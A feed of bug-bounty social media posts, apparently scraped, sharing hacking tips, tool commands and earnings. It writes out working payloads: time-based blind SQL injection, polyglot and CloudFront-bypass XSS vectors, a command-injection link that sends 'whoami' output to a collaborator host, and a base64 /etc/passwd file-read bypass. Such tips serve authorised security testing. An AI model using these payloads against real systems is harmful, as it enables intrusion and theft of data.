Bug : Blind SQL Injection Tips : X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z #bugbountytip

Wordlists for finding git & svn files #bugbounty #bugbountytips

How I Escalated a Time-Based SQL Injection to RCE infosecwriteups.com/how-i-escalate…

The best single #XSS vector you'll ever have! Payload : JavaScript://%250Aalert?.(1)// '/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--> </Title/</Style/</Script/</textArea/</iFrame/</noScript> \74k<K/contentEditable/autoFocus/OnFocus= /*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->

pentestbook.six2dez.com/recon/public-i…

Blind #SQLInjection on #GraphQL The API accepts queries for user "gender" data and accepts 3 keywords "M,F,NA", I found the parader "xxxkeyword_xx_xx" is vulnerable to blind-SQL injection attacks using my fav payload: "0\"XOR(if(now()=sysdate(),sleep(9),0))XOR\"Z", #BugBounty

First Bug in Bugcrowd Using Github Dork by Abdalla Abdelrhman medium.com/p/first-bug-in…

Long time no hacking Last 24 hr was really good, I was able to found 3 bugs in 2 different programs with Hero_of_Digital. All using shodun. #BugBounty #bugcrowd #hacker

url/?f=etc/passwd ==> 403 encode etc/passwd as base64 url/?f=L2V0Yy9wYXNzd2Q= ==> 200 #note you can use this trick in SQL , SSTI , XSS , LFI , Etc... #bugbountytips #bugbountytip

My first time RCE you can embed a link on your target program? try this one Payload: http://collaboratorlink(.)com?`whoami` If you're lucky then you'll like this #BugBounty #bugbountytips #RCE

CloudFront bypass:⚔️ ">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'> Would be interested to know if this is target specific or other CloudFront websites are vulnerable #infosec #xss #cybersec #bugbountytips

Use dnsx to bruteforce subdomains and filter the successful requests with httpx! ⌨️ dnsx -d roots.txt -w <key,words> | httpx -sc -mc 200 🌀 Install dnsx 👉 github.com/projectdiscove… 🌀 Install httpx 👉 github.com/projectdiscove… #hackwithautomation #security #bugbounty

🥁 4rsh4n andrewjlamarche anhchangmutrang ArkCSI bk273 booboo brahim_nah BrandonReynolds Chapuka dk4trin hacker_might Hero_of_Digital khammad93 Kullai116

I've made over 100k on SSRF vulnerabilities. They aren't always as simple as pointing it at localhost or AWS Metadata service. Here are some tricks I've picked up over the past 5 years of web app testing:

I've made $500k+ from SSRF vulnerabilities. Here are my tricks:

Quick Wins: If you come across an outdated Swagger instance, always remember to test for XSS vulnerabilities. Try these payloads and earn some quick bounties! http://example(.)com/swagger-ui/index.html?configUrl=https://jumpy-floor.surge(.)sh/test.json

🔍 Bug Bounty Tips: Crawling parameters with Katana for quick XSS/SQLI wins! 🚀 When it comes to efficient bug hunting, active crawling can be a game-changer. One of the tools I rely on is Katana, which helps retrieve URLs and parameters for thorough testing against XSS, SQLI,

Search for all leaked keys/secrets using one regex! regex:gist.github.com/h4x0r-dz/be69c… Credits:H4x0r.DZ #bugbountytips #BugBounty #bugbountytip #bugbounty

🚨Scanning for SQL and XSS vulnerability🚨 📥Credits - Md Ismail Sojal #infosec #cybersec #BugBounty #bugbountytip #bugbountytips #ethicalhacking #CyberSecurity #Pentesting #sqli #xss #CyberSecurityAwareness #bugbounty #ssrf #AEM #MAPT

I earned $7,500 for my submission on @bugcrowd bugcrowd.com/hero_of_digital #ItTakesACrowd #BugBounty